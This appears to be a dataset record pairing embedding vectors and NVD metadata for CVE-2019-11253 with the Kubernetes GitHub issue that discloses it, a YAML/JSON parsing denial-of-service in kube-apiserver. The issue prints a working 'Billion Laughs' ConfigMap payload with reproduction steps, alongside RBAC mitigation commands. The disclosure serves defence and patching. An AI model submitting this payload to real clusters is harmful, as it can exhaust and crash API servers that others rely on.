0.008061196655035019, -0.006166083738207817, -0.014408431015908718, -0.007155444007366896, 0.008123902603983879, 0.008214477449655533, -0.010471891611814499, -0.023870060220360756, 0.0011931546032428741, 0.010562466457486153, -0.010708780959248543, -0.002532623242586851, 0.0068663000129163265, -0.030098849907517433, -0.013558417558670044, -0.002644100459292531, 0.001376046915538609, 0.021166738122701645, -0.012548155151307583, 0.010158361867070198, 0.015467464923858643, 0.02182166650891304, -0.005539024714380503, -0.022058555856347084, 0.005953580606728792, 0.006371620111167431, 0.012931358069181442, -0.021835600957274437, -0.013189149089157581, -0.002562234178185463, -0.009656714275479317, -0.007921850308775902, 0.012722337618470192, -0.007057901471853256, 0.01764127053320408, 0.013642025180161, -0.013544482178986073, -0.004396383184939623, 0.004309291485697031, 0.014519908465445042, 0.006747855804860592, 0.005786364432424307, 0.015244510024785995, 0.010235002264380455, 0.018365873023867607, -0.013342429883778095, 0.01751585863530636, 0.023493824526667595, -0.003203228348866105, 0.04562205448746681, 0.02194707840681076, 0.015704354271292686, 0.02152903936803341, 0.0029367280658334494, -0.008214477449655533, -0.028315214440226555, -0.005532057024538517, -0.013899816200137138, 0.0011757363099604845, 0.02105526067316532, -0.002959371777251363, 0.017487989738583565, 0.007817340083420277, 0.021124932914972305, 0.020901979878544807, 0.0064134239219129086, 0.030907059088349342, -0.0057619791477918625, 0.021961012855172157, 0.0024019856937229633, 0.024929093196988106, 0.002874022116884589, -0.014352692291140556, -0.01249938365072012, -0.027172572910785675, 0.013523580506443977, 0.033220212906599045, 0.0020396849140524864, -0.015230575576424599, -0.0019839461892843246, -0.014937947504222393, -0.018853584304451942, -0.014924013055860996, 0.022281508892774582, 0.00189511280041188, 0.0051000830717384815, 0.006235756911337376, 0.0030638817697763443, 0.010130492970347404, 0.0011827036505565047, -0.01957818679511547, -0.011642402037978172, 0.008207510225474834, -0.009148099459707737, 0.003936539404094219, -0.013467841781675816, -0.001161801628768444, -0.01970359869301319, 0.0014465911081060767, -0.02038639783859253, -0.001910789287649095, -0.0017322514904662967, -0.004065434914082289, -0.020205246284604073, -0.02084624022245407, -0.008242347277700901, 0.015885503962635994, 0.0027451266068965197, -0.011809618212282658, 0.020121637731790543, -0.019606055691838264, -0.002025750232860446, -0.021584777161478996, -0.005511155351996422, -0.002010073745623231, 0.015565006993710995, -0.019522449001669884, 0.0011966383317485452, 0.012206755578517914, -0.0008034197962842882, -0.007110156584531069, -0.013927685096859932, -0.012346101924777031, -0.017390446737408638, 0.0025988128036260605, -0.010666976682841778, 0.0016364507609978318, 0.014380562119185925, -0.026197146624326706, 0.003100460162386298, -0.004365030210465193, 0.013398168608546257, -0.005535540636628866, 0.005768946371972561, 0.013607188127934933, -0.01002598274499178, -0.004706428851932287, 0.00507569732144475, -0.001376046915538609, 0.01822652667760849, 0.015355987474322319, -0.023075785487890244, -0.010297708213329315, -0.014164574444293976, -0.0018655016319826245, 0.002541332272812724, -0.015578941442072392, -0.003283352591097355, 0.02055361308157444, 0.0024594662245362997, -0.01759946718811989, -0.007984556257724762, 0.012576024048030376, -0.00875792931765318, 0.0025674598291516304, 0.02233724854886532, 0.0029193097725510597, -0.024329904466867447, 0.009155066683888435, -0.0013359847944229841, 0.006180018652230501, -0.014826470986008644, -0.011217395775020123, -0.009162033908069134, -0.014192444272339344, 0.0029959504026919603, -0.01446416974067688, -0.005598246585577726, -0.016331413760781288, -0.0024646916426718235, 0.008667354471981525, 0.003915637265890837, -0.0011382868979126215, 0.010743617080152035, 0.0017322514904662967, -0.004650690592825413, 0.000009396365385327954, -0.0021285181865096092, 0.028217671439051628, 0.009210805408656597, 0.012896521016955376, 0.008061196655035019, -0.008841536939144135, -0.017543727532029152, 0.014882208779454231, -0.007155444007366896, 0.0177666824311018, 0.0019038219470530748, 0.00198220438323915, 0.00640645669773221, -0.01755766198039055, -0.01801750622689724, -0.0008648193906992674, -0.028788993135094643, -0.00548676960170269, -0.001922982046380639, 0.022142162546515465, 0.012534219771623611, 0.0030429798644036055, -0.0029889829456806183, 0.0001886621321318671, -0.004657657817006111, -0.01433875784277916, 0.007176346145570278, 0.0025674598291516304, -0.004594951868057251, -0.004493925720453262, 0.003333865664899349, 0.009977211244404316, -0.014157607220113277, 0.046708956360816956, 0.02630862407386303, -0.0013891106937080622, 0.009440727531909943, -0.007155444007366896, -0.0021859987173229456, 0.004615853540599346, -0.01860276237130165, -0.01619206741452217, 0.011586664244532585, -0.012826847843825817, -0.005545991938561201, 0.009607942774891853, -0.022978242486715317, 0.015369921922683716, -0.02109706401824951, 0.0035115324426442385, 0.012952259741723537, 0.003940023016184568, -0.006260142661631107, 0.0010085204849019647, -0.013293658383190632, 0.008430465124547482, -0.020860174670815468, 0.009015720337629318, 0.014965817332267761, 0.0035080488305538893, 0.02177986316382885, 0.0038668662309646606, -0.03464154526591301, 0.008785798214375973, -0.010318610817193985, 0.003354767570272088, 0.0013499194756150246, 0.01577402651309967, 0.005998868029564619, -0.025904519483447075, 0.018588826060295105, -0.0043476116843521595, -0.04746142774820328, -0.009782126173377037, 0.009726387448608875, 0.0058873905800282955, -0.004354578908532858, -0.00529865175485611, -0.009210805408656597, -0.02593238838016987, -0.011287068948149681, 0.0039713759906589985, 0.010095655918121338, -0.00405846768990159, 0.007322660181671381, 0.00485274288803339, -0.013377266936004162, -0.0036926830653101206, -0.009851799346506596, -0.009371054358780384, -0.008298086002469063, 0.0028809895738959312, -0.0036961666774004698, -0.011126819998025894, 0.0059466129168868065, 0.0017757973400875926, 0.013920717872679234, -0.013530547730624676, 0.03210543841123581, -0.014673189260065556, 0.011621500365436077, -0.0055529591627418995, -0.0027886724565178156, 0.020442135632038116, 0.005765462759882212, 0.00009237150516128168, 0.005967515055090189, 0.010841160081326962, -0.03692682832479477, 0.01851915381848812, 0.0027660285122692585, -0.0008865922573022544, -0.009085393510758877, -0.009155066683888435, -0.008702190592885017, -0.019229819998145103, -0.004173428285866976, -0.036731746047735214, -0.003184068249538541, -0.02892833948135376, -0.008785798214375973, -0.008416530676186085, -0.002034459263086319, 0.018156852573156357, 0.028956208378076553, -0.025054505094885826, -0.006827979814261198, 0.012290364131331444, -0.013920717872679234, 0.004075885750353336, 0.010541564784944057, 0.010039917193353176, -0.0018132467521354556, -0.016860930249094963, -0.009886636398732662, -0.022476594895124435, -0.014924013055860996, 0.001788861001841724, -0.02118067257106304, 0.003922604955732822, -0.015077294781804085, -0.012896521016955376, -0.0031579406931996346, 0.009273511357605457, 0.013098573312163353, -0.021751992404460907, 0.006810561753809452, -0.009823930449783802, -0.020107703283429146, 0.021292150020599365, 0.017878159880638123, 0.021933143958449364, -0.0028618292417377234, -0.006810561753809452, 0.0025047538802027702, 0.02042820118367672, -0.000613560201600194, -0.013063737191259861, 0.0064726462587714195, 0.004493925720453262, 0.025611892342567444, -0.0003496726858429611, 0.012701435945928097, 0.007308725267648697, -0.00009057524584932253, 0.00258487812243402, 0.005716691259294748, -0.0034279245883226395, 0.012840782292187214, 0.009182936511933804, 0.0009823930449783802, 0.01895112730562687, -0.013690796680748463, -0.032495610415935516, 0.043197423219680786, -0.011579696089029312, -0.0008143062586896122, -0.012840782292187214, 0.0021598711609840393, -0.018533088266849518, -0.012534219771623611, -0.000058188063121633604, -0.028900470584630966, 0.015314183197915554, -0.006361168809235096, 0.03344316780567169, -0.0011199977016076446, -0.0005800299113616347, 0.022894633933901787, 0.0009571364498697221, 0.0005478060338646173, -0.027381593361496925, 0.011746912263333797, -0.008806700818240643, -0.026211081072688103, 0.007155444007366896, -0.00558082852512598, 0.017404381185770035, 0.02233724854886532, -0.0060476395301520824, -0.00479003693908453, 0.022392986342310905, -0.0006671214941889048, -0.009036622010171413, 0.00003214223761460744, 0.0026144892908632755, 0.0044242520816624165, 0.01307070441544056, 0.007782503496855497, 0.003135296981781721, 0.011280101723968983, 0.027158638462424278, -0.010478858835995197, 0.018574891611933708, -0.020483938977122307, -0.005458900239318609, 0.0002033588389167562, 0.0021859987173229456, -0.0005330004496499896, -0.02105526067316532, 0.012269461527466774, 0.010917800478637218, 0.024009406566619873, 0.006873267702758312, -0.009224739857017994, 0.010019015520811081, -0.0025047538802027702, -0.007859144359827042, 0.011907161213457584, 0.007475941441953182, -0.004354578908532858, 0.017989637330174446, -0.02478974685072899, -0.008019392378628254, -0.006023253779858351, -0.007434137165546417, 0.024817615747451782 ]
CVE-2019-11253
2019-10-17T16:15:10.443000
Improper input validation in the Kubernetes API server in versions v1.0-1.12 and versions prior to v1.13.12, v1.14.8, v1.15.5, and v1.16.2 allows authorized users to send malicious YAML or JSON payloads, causing the API server to consume excessive CPU or memory, potentially crashing and becoming unavailable. Prior to v1.14.0, default RBAC policy authorized anonymous users to submit requests that could trigger this vulnerability. Clusters upgraded from a version prior to v1.14.0 keep the more permissive policy by default for backwards compatibility.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "[email protected]", "type": "Primary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "[email protected]", "type": "Secondary" } ] }
[ { "source": "[email protected]", "tags": [ "Third Party Advisory" ], "url": "https://access.redhat.com/errata/RHSA-2019:3239" }, { "source": "[email protected]", "tags": [ "Third Party Advisory" ], "url": "https://access.redhat.com/errata/RHSA-2019:3811" }, { "source": "[email protected]", "tags": [ "Third Party Advisory" ], "url": "https://access.redhat.com/errata/RHSA-2019:3905" }, { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Mitigation", "Third Party Advisory" ], "url": "https://github.com/kubernetes/kubernetes/issues/83253" }, { "source": "[email protected]", "tags": null, "url": "https://groups.google.com/forum/#%21topic/kubernetes-security-announce/jk8polzSUxs" }, { "source": "[email protected]", "tags": [ "Third Party Advisory" ], "url": "https://security.netapp.com/advisory/ntap-20191031-0006/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:kubernetes:kubernetes:*:*:*:*:*:*:*:*", "matchCriteriaId": "F0820894-56B7-4CB8-AE5C-29639FA59718", "versionEndExcluding": null, "versionEndIncluding": "1.12.10", "versionStartExcluding": null, "versionStartIncluding": "1.1.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:kubernetes:kubernetes:*:*:*:*:*:*:*:*", "matchCriteriaId": "9FF055F3-E11D-41DB-9ED7-434D9ED905B4", "versionEndExcluding": "1.13.2", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "1.13.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:kubernetes:kubernetes:*:*:*:*:*:*:*:*", "matchCriteriaId": "ADA3952E-8133-4E6A-A365-4FD74ABA962C", "versionEndExcluding": "1.14.8", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "1.14.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:kubernetes:kubernetes:*:*:*:*:*:*:*:*", "matchCriteriaId": "F9F7837F-DA69-453E-8B24-1EDF0A5CAB4C", "versionEndExcluding": "1.15.5", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "1.15.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:kubernetes:kubernetes:*:*:*:*:*:*:*:*", "matchCriteriaId": "E1BDF819-871C-4E34-978F-BAFF8D895B84", "versionEndExcluding": "1.16.2", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "1.16.0", "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:redhat:openshift_container_platform:3.9:*:*:*:*:*:*:*", "matchCriteriaId": "309CB6F8-F178-454C-BE97-787F78647C28", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:redhat:openshift_container_platform:3.10:*:*:*:*:*:*:*", "matchCriteriaId": "4DBCD38F-BBE8-488C-A8C3-5782F191D915", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:redhat:openshift_container_platform:3.11:*:*:*:*:*:*:*", "matchCriteriaId": "2F87326E-0B56-4356-A889-73D026DB1D4B", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/kubernetes/kubernetes/issues/83253
[ "Exploit", "Issue Tracking", "Mitigation", "Third Party Advisory" ]
github.com
[ "kubernetes", "kubernetes" ]
CVE-2019-11253 is a denial of service vulnerability in the kube-apiserver, allowing authorized users sending malicious YAML or JSON payloads to cause kube-apiserver to consume excessive CPU or memory, potentially crashing and becoming unavailable. This vulnerability has been given an initial severity of High, with a score of 7.5 ([CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H](https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)). Prior to v1.14.0, default RBAC policy authorized anonymous users to submit requests that could trigger this vulnerability. Clusters upgraded from a version prior to v1.14.0 keep the more permissive policy by default for backwards compatibility. See the mitigation section below for instructions on how to install the more restrictive v1.14+ policy. **Affected versions:** * Kubernetes v1.0.0-1.12.x * Kubernetes v1.13.0-1.13.11, resolved in v1.13.12 by https://github.com/kubernetes/kubernetes/pull/83436 * Kubernetes v1.14.0-1.14.7, resolved in v1.14.8 by https://github.com/kubernetes/kubernetes/pull/83435 * Kubernetes v1.15.0-1.15.4, resolved in v1.15.5 by https://github.com/kubernetes/kubernetes/pull/83434 * Kubernetes v1.16.0-1.16.1, resolved in v1.16.2 by https://github.com/kubernetes/kubernetes/pull/83433 All four patch releases are now available. Fixed in master by #83261 **Mitigation:** Requests that are rejected by authorization do not trigger the vulnerability, so managing authorization rules and/or access to the Kubernetes API server mitigates which users are able to trigger this vulnerability. To manually apply the more restrictive v1.14.x+ policy, either as a pre-upgrade mitigation, or as an additional protection for an upgraded cluster, save the [attached file](https://github.com/kubernetes/kubernetes/files/3735508/rbac.yaml.txt) as `rbac.yaml`, and run: ```sh kubectl auth reconcile -f rbac.yaml --remove-extra-subjects --remove-extra-permissions ``` **Note: this removes the ability for unauthenticated users to use `kubectl auth can-i`** If you are running a version prior to v1.14.0: * in addition to installing the restrictive policy, turn off autoupdate for this clusterrolebinding so your changes aren’t replaced on an API server restart: ```sh kubectl annotate --overwrite clusterrolebinding/system:basic-user rbac.authorization.kubernetes.io/autoupdate=false ``` * after upgrading to v1.14.0 or greater, you can remove this annotation to reenable autoupdate: ```sh kubectl annotate --overwrite clusterrolebinding/system:basic-user rbac.authorization.kubernetes.io/autoupdate=true ``` ============= **Original description follows:** **Introduction** Posting this as an issue following report to the security list who suggested putting it here as it's already public in a Stackoverflow question [here](https://stackoverflow.com/questions/58129150/security-yaml-bomb-user-can-restart-kube-api-by-sending-configmap/58133282#58133282) **What happened**: When creating a ConfigMap object which has recursive references contained in it, excessive CPU usage can occur. This appears to be an instance of a ["Billion Laughs" attack](https://en.wikipedia.org/wiki/Billion_laughs_attack) which is quite well known as an XML parsing issue. Applying this manifest to a cluster causes the client to hang for some time with considerable CPU usage. ``` apiVersion: v1 data: a: &a ["web","web","web","web","web","web","web","web","web"] b: &b [*a,*a,*a,*a,*a,*a,*a,*a,*a] c: &c [*b,*b,*b,*b,*b,*b,*b,*b,*b] d: &d [*c,*c,*c,*c,*c,*c,*c,*c,*c] e: &e [*d,*d,*d,*d,*d,*d,*d,*d,*d] f: &f [*e,*e,*e,*e,*e,*e,*e,*e,*e] g: &g [*f,*f,*f,*f,*f,*f,*f,*f,*f] h: &h [*g,*g,*g,*g,*g,*g,*g,*g,*g] i: &i [*h,*h,*h,*h,*h,*h,*h,*h,*h] kind: ConfigMap metadata: name: yaml-bomb namespace: default ``` **What you expected to happen**: Ideally it would be good for a maximum size of entity to be defined, or perhaps some limit on recursive references in YAML parsed by kubectl. One note is that the original poster on Stackoverflow indicated that the resource consumption was in `kube-apiserver` but both tests I did (1.16 client against 1.15 Kubeadm cluster and 1.16 client against 1.16 kubeadm cluster) showed the CPU usage client-side. **How to reproduce it (as minimally and precisely as possible)**: Get the manifest above and apply to a cluster as normal with `kubectl create -f <manifest>`. Use `top` or another CPU monitor to observe the quantity of CPU time used. **Anything else we need to know?**: **Environment**: - Kubernetes version (use `kubectl version`): **test 1** (linux AMD64 client, Kubeadm cluster running in kind) ``` Client Version: version.Info{Major:"1", Minor:"16", GitVersion:"v1.16.0", GitCommit:"2bd9643cee5b3b3a5ecbd3af49d09018f0773c77", GitTreeState:"clean", BuildDate:"2019-09-18T14:36:53Z", GoVersion:"go1.12.9", Compiler:"gc", Platform:"linux/amd64"} Server Version: version.Info{Major:"1", Minor:"15", GitVersion:"v1.15.0", GitCommit:"e8462b5b5dc2584fdcd18e6bcfe9f1e4d970a529", GitTreeState:"clean", BuildDate:"2019-06-25T23:41:27Z", GoVersion:"go1.12.5", Compiler:"gc", Platform:"linux/amd64"} ``` **test 2** (Linux AMD64 client, Kubeadm cluster running in VMWare Workstation) ``` Client Version: version.Info{Major:"1", Minor:"16", GitVersion:"v1.16.0", GitCommit:"2bd9643cee5b3b3a5ecbd3af49d09018f0773c77", GitTreeState:"clean", BuildDate:"2019-09-18T14:36:53Z", GoVersion:"go1.12.9", Compiler:"gc", Platform:"linux/amd64"} Server Version: version.Info{Major:"1", Minor:"16", GitVersion:"v1.16.0", GitCommit:"2bd9643cee5b3b3a5ecbd3af49d09018f0773c77", GitTreeState:"clean", BuildDate:"2019-09-18T14:27:17Z", GoVersion:"go1.12.9", Compiler:"gc", Platform:"linux/amd64"} ```
CVE-2019-11253: Kubernetes API Server JSON/YAML parsing vulnerable to resource exhaustion attack
https://api.github.com/repos/kubernetes/kubernetes/issues/83253/comments
17
2019-09-27T16:53:31
2022-10-14T02:09:16Z
https://github.com/kubernetes/kubernetes/issues/83253
499,548,171
83,253
true
This is a GitHub Issue repo:kubernetes owner:kubernetes Title : CVE-2019-11253: Kubernetes API Server JSON/YAML parsing vulnerable to resource exhaustion attack Issue date: --- start body --- CVE-2019-11253 is a denial of service vulnerability in the kube-apiserver, allowing authorized users sending malicious YAML or JSON payloads to cause kube-apiserver to consume excessive CPU or memory, potentially crashing and becoming unavailable. This vulnerability has been given an initial severity of High, with a score of 7.5 ([CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H](https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)). Prior to v1.14.0, default RBAC policy authorized anonymous users to submit requests that could trigger this vulnerability. Clusters upgraded from a version prior to v1.14.0 keep the more permissive policy by default for backwards compatibility. See the mitigation section below for instructions on how to install the more restrictive v1.14+ policy. **Affected versions:** * Kubernetes v1.0.0-1.12.x * Kubernetes v1.13.0-1.13.11, resolved in v1.13.12 by https://github.com/kubernetes/kubernetes/pull/83436 * Kubernetes v1.14.0-1.14.7, resolved in v1.14.8 by https://github.com/kubernetes/kubernetes/pull/83435 * Kubernetes v1.15.0-1.15.4, resolved in v1.15.5 by https://github.com/kubernetes/kubernetes/pull/83434 * Kubernetes v1.16.0-1.16.1, resolved in v1.16.2 by https://github.com/kubernetes/kubernetes/pull/83433 All four patch releases are now available. Fixed in master by #83261 **Mitigation:** Requests that are rejected by authorization do not trigger the vulnerability, so managing authorization rules and/or access to the Kubernetes API server mitigates which users are able to trigger this vulnerability. To manually apply the more restrictive v1.14.x+ policy, either as a pre-upgrade mitigation, or as an additional protection for an upgraded cluster, save the [attached file](https://github.com/kubernetes/kubernetes/files/3735508/rbac.yaml.txt) as `rbac.yaml`, and run: ```sh kubectl auth reconcile -f rbac.yaml --remove-extra-subjects --remove-extra-permissions ``` **Note: this removes the ability for unauthenticated users to use `kubectl auth can-i`** If you are running a version prior to v1.14.0: * in addition to installing the restrictive policy, turn off autoupdate for this clusterrolebinding so your changes aren’t replaced on an API server restart: ```sh kubectl annotate --overwrite clusterrolebinding/system:basic-user rbac.authorization.kubernetes.io/autoupdate=false ``` * after upgrading to v1.14.0 or greater, you can remove this annotation to reenable autoupdate: ```sh kubectl annotate --overwrite clusterrolebinding/system:basic-user rbac.authorization.kubernetes.io/autoupdate=true ``` ============= **Original description follows:** **Introduction** Posting this as an issue following report to the security list who suggested putting it here as it's already public in a Stackoverflow question [here](https://stackoverflow.com/questions/58129150/security-yaml-bomb-user-can-restart-kube-api-by-sending-configmap/58133282#58133282) **What happened**: When creating a ConfigMap object which has recursive references contained in it, excessive CPU usage can occur. This appears to be an instance of a ["Billion Laughs" attack](https://en.wikipedia.org/wiki/Billion_laughs_attack) which is quite well known as an XML parsing issue. Applying this manifest to a cluster causes the client to hang for some time with considerable CPU usage. ``` apiVersion: v1 data: a: &a ["web","web","web","web","web","web","web","web","web"] b: &b [*a,*a,*a,*a,*a,*a,*a,*a,*a] c: &c [*b,*b,*b,*b,*b,*b,*b,*b,*b] d: &d [*c,*c,*c,*c,*c,*c,*c,*c,*c] e: &e [*d,*d,*d,*d,*d,*d,*d,*d,*d] f: &f [*e,*e,*e,*e,*e,*e,*e,*e,*e] g: &g [*f,*f,*f,*f,*f,*f,*f,*f,*f] h: &h [*g,*g,*g,*g,*g,*g,*g,*g,*g] i: &i [*h,*h,*h,*h,*h,*h,*h,*h,*h] kind: ConfigMap metadata: name: yaml-bomb namespace: default ``` **What you expected to happen**: Ideally it would be good for a maximum size of entity to be defined, or perhaps some limit on recursive references in YAML parsed by kubectl. One note is that the original poster on Stackoverflow indicated that the resource consumption was in `kube-apiserver` but both tests I did (1.16 client against 1.15 Kubeadm cluster and 1.16 client against 1.16 kubeadm cluster) showed the CPU usage client-side. **How to reproduce it (as minimally and precisely as possible)**: Get the manifest above and apply to a cluster as normal with `kubectl create -f <manifest>`. Use `top` or another CPU monitor to observe the quantity of CPU time used. **Anything else we need to know?**: **Environment**: - Kubernetes version (use `kubectl version`): **test 1** (linux AMD64 client, Kubeadm cluster running in kind) ``` Client Version: version.Info{Major:"1", Minor:"16", GitVersion:"v1.16.0", GitCommit:"2bd9643cee5b3b3a5ecbd3af49d09018f0773c77", GitTreeState:"clean", BuildDate:"2019-09-18T14:36:53Z", GoVersion:"go1.12.9", Compiler:"gc", Platform:"linux/amd64"} Server Version: version.Info{Major:"1", Minor:"15", GitVersion:"v1.15.0", GitCommit:"e8462b5b5dc2584fdcd18e6bcfe9f1e4d970a529", GitTreeState:"clean", BuildDate:"2019-06-25T23:41:27Z", GoVersion:"go1.12.5", Compiler:"gc", Platform:"linux/amd64"} ``` **test 2** (Linux AMD64 client, Kubeadm cluster running in VMWare Workstation) ``` Client Version: version.Info{Major:"1", Minor:"16", GitVersion:"v1.16.0", GitCommit:"2bd9643cee5b3b3a5ecbd3af49d09018f0773c77", GitTreeState:"clean", BuildDate:"2019-09-18T14:36:53Z", GoVersion:"go1.12.9", Compiler:"gc", Platform:"linux/amd64"} Server Version: version.Info{Major:"1", Minor:"16", GitVersion:"v1.16.0", GitCommit:"2bd9643cee5b3b3a5ecbd3af49d09018f0773c77", GitTreeState:"clean", BuildDate:"2019-09-18T14:27:17Z", GoVersion:"go1.12.9", Compiler:"gc", Platform:"linux/amd64"} ``` --- end body ---
6,064
[ -0.02656124159693718, -0.014549623243510723, -0.013647753745317459, 0.007131150923669338, 0.019442062824964523, -0.03254709765315056, -0.02376784197986126, 0.01888338290154934, 0.018580099567770958, 0.017973532900214195, 0.017877759411931038, 0.0064567443914711475, 0.021197915077209473, 0.0028752065263688564, 0.03310577943921089, 0.03767099231481552, -0.01671251282095909, -0.026337770745158195, -0.001256032264791429, -0.006899697706103325, -0.006923641078174114, -0.015164170414209366, -0.023241087794303894, 0.06017781421542168, 0.019729385152459145, 0.018675873056054115, 0.015267925336956978, 0.018037382513284683, -0.029546190053224564, 0.017989495769143105, 0.015778718516230583, 0.01537168025970459, -0.004613100551068783, 0.00994450319558382, 0.06672234833240509, 0.007893349975347519, 0.040001485496759415, 0.037575218826532364, -0.02791803702712059, -0.018085269257426262, 0.0010854353895410895, -0.04807840287685394, -0.0008255494176410139, 0.03454238548874855, -0.015148208476603031, 0.0054271770641207695, -0.015954304486513138, -0.022171614691615105, -0.027119921520352364, 0.008048982359468937, 0.012825695797801018, -0.05123893544077873, -0.02892366051673889, -0.05098353698849678, 0.015810644254088402, -0.04715259000658989, -0.003433886682614684, -0.0067560370080173016, 0.02719973400235176, 0.020080555230379105, 0.035053178668022156, -0.00152539589907974, 0.011189562268555164, 0.027455130591988564, 0.024230748414993286, 0.010998014360666275, -0.0054311673156917095, 0.031637247651815414, -0.03693672642111778, -0.007482321001589298, -0.024342484772205353, -0.014581547118723392, 0.00017970040789805353, 0.006129517685621977, 0.060273587703704834, -0.023640144616365433, 0.029498303309082985, 0.042459677904844284, -0.012865602038800716, 0.019298402592539787, -0.006899697706103325, 0.03248324990272522, -0.0283490177243948, 0.005678582936525345, 0.03320155292749405, 0.005451120436191559, -0.0481741763651371, -0.06400876492261887, 0.029131170362234116, -0.05095161497592926, -0.021900255233049393, 0.03272268548607826, 0.011053882539272308, -0.021421385928988457, 0.01536369975656271, 0.026018524542450905, -0.026289884001016617, -0.0009612288558855653, -0.06285947561264038, -0.015467454679310322, -0.06404069066047668, -0.005111921578645706, -0.0020032667089253664, -0.0009303019032813609, 0.006640310399234295, 0.016505002975463867, -0.013144942000508308, 0.027710527181625366, -0.01988900639116764, 0.1316569298505783, 0.042778924107551575, 0.008088887669146061, -0.03655363246798515, -0.015555246733129025, -0.02054346166551113, 0.012282978743314743, -0.003898788243532181, -0.0011363151716068387, -0.060912080109119415, -0.013384375721216202, -0.03304193168878555, -0.024597881361842155, -0.003621443407610059, -0.030615663155913353, -0.06183789297938347, 0.02726358361542225, 0.005610743071883917, 0.000019485210941638798, -0.013583905063569546, -0.02298569120466709, -0.017606399953365326, 0.004668968264013529, -0.02236316166818142, -0.021804481744766235, 0.0061774044297635555, -0.00531943142414093, 0.027008187025785446, 0.056378789246082306, 0.0009312995825894177, -0.0039267223328351974, -0.027487054467201233, -0.012809733860194683, 0.01743081584572792, 0.011939789168536663, -0.03304193168878555, 0.007538189180195332, -0.002555960789322853, 0.015204076655209064, -0.01255433727055788, 0.0032303675543516874, -0.006273177918046713, -0.008436067961156368, 0.03291423246264458, 0.033361174166202545, 0.04913191497325897, -0.04376858472824097, -0.01880357228219509, 0.014166528359055519, 0.016313455998897552, 0.03460623323917389, 0.0036633445415645838, -0.03447853401303291, -0.014733188785612583, -0.02758282795548439, 0.015148208476603031, 0.0012709969887509942, 0.016321437433362007, -0.010375485755503178, -0.021437348797917366, 0.024166898801922798, 0.0030448059551417828, -0.030583737418055534, 0.017718136310577393, 0.00734664173796773, -0.03760714456439018, -0.016904059797525406, 0.00976093765348196, 0.023879578337073326, 0.02691241353750229, 0.016856173053383827, -0.016305474564433098, 0.02895558439195156, -0.017526589334011078, 0.0162256620824337, 0.02898751012980938, 0.005004176404327154, -0.014629433862864971, 0.016600776463747025, -0.010159994475543499, -0.012945413589477539, 0.0006330043543130159, 0.018021419644355774, 0.003669330384582281, -0.00778560433536768, -0.02405516430735588, 0.009329956024885178, -0.02336878515779972, -0.010471259243786335, 0.027981886640191078, -0.040320731699466705, 0.012658092193305492, -0.006484678480774164, -0.04367281123995781, 0.017287155613303185, -0.05682573467493057, 0.03623438626527786, 0.0053952522575855255, 0.009657182730734348, 0.009170332923531532, -0.02338474802672863, -0.048333797603845596, -0.0047687324695289135, -0.0039726137183606625, 0.010742617771029472, 0.013192828744649887, 0.01272992230951786, -0.0016032119747251272, 0.008033020421862602, -0.035819366574287415, -0.0009682123782113194, 0.044502850621938705, -0.02724762074649334, 0.022618558257818222, -0.0053074597381055355, -0.005522950552403927, -0.011564675718545914, 0.0005043084383942187, -0.03869257867336273, -0.014286245219409466, -0.008483954705297947, 0.042395830154418945, -0.0010934164747595787, 0.01486886851489544, 0.01605805940926075, 0.017957570031285286, -0.04935538396239281, 0.0010131063172593713, 0.01709560677409172, 0.012267015874385834, -0.008084896951913834, 0.018612025305628777, 0.0020042643882334232, -0.033967744559049606, -0.017893722280859947, -0.0013308555353432894, 0.03875642642378807, -0.035053178668022156, 0.014581547118723392, -0.016920022666454315, 0.019282439723610878, -0.032978080213069916, 